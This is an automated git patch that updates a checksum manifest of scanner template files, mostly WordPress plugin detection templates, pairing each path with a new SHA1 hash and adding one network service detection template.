+http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
+http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
+http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
+http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
+http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
+http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
+http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
+http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
+http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
+http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
+http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
+http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
+http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
+http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
+http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
+http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
+http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
+http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
+http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
+http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
+http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
+http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
+http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
+http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
+http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
+http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
+http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
-http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
-http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
-http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
-http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
-http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
-http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
-http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
-http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
-http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
-http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:8e1eabb506c0b746de758852d2b8980766a0b94c
-http/technologies/wordpress/plugins/sg-security.yaml:9052be594f4d2bffac320adf7b1a019f797528a5
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
+http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
+http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
+http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
+http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
+http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
+http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
+http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
+http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
+http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
+http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85
+http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
-http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
+http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
+http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
-http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
-http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
-http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
-http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
-http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
-http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
-http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7133,6 +7134,7 @@ network/detection/vmware-authentication-daemon-detect.yaml:504e35ba7ab39cd1fa0f4
 network/detection/vnc-service-detect.yaml:a42e2c93779cbac0205589ca8e95d3bd82ad742b
 network/detection/weblogic-iiop-detect.yaml:94b8c1aaec6ffabca45c86cfb25b3a609e30bdfe
 network/detection/weblogic-t3-detect.yaml:ce204c445556d0e1e07af1f6aaa65ee9c817d252
+network/detection/ws_ftp-ssh-detect.yaml:959fade67f1da79c8db0842a044999294a58d5f7
 network/detection/xlight-ftp-service-detect.yaml:bc7356eb6a29677333feb95946d55a03aa9a636b
 network/enumeration/beanstalk-service.yaml:6b761f32a18de725b06376576ad12d85a4ebf832
 network/enumeration/kafka-topics-list.yaml:c90f512f4ec006edc4c6986c0728015fa8525358
@@ -7204,7 +7206,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:ec3061826c60ef1ee3caaf7393298512b65849b8
+templates-checksum.txt:4a30f62f8d3766b257829e95cfb25d5e83080874
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From ce1a84f8c433715e6f67b10db740e80e26ffda21 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 30 Sep 2023 08:23:25 +0000
Subject: [PATCH 0625/1090] TemplateMan Update [Sat Sep 30 08:23:25 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
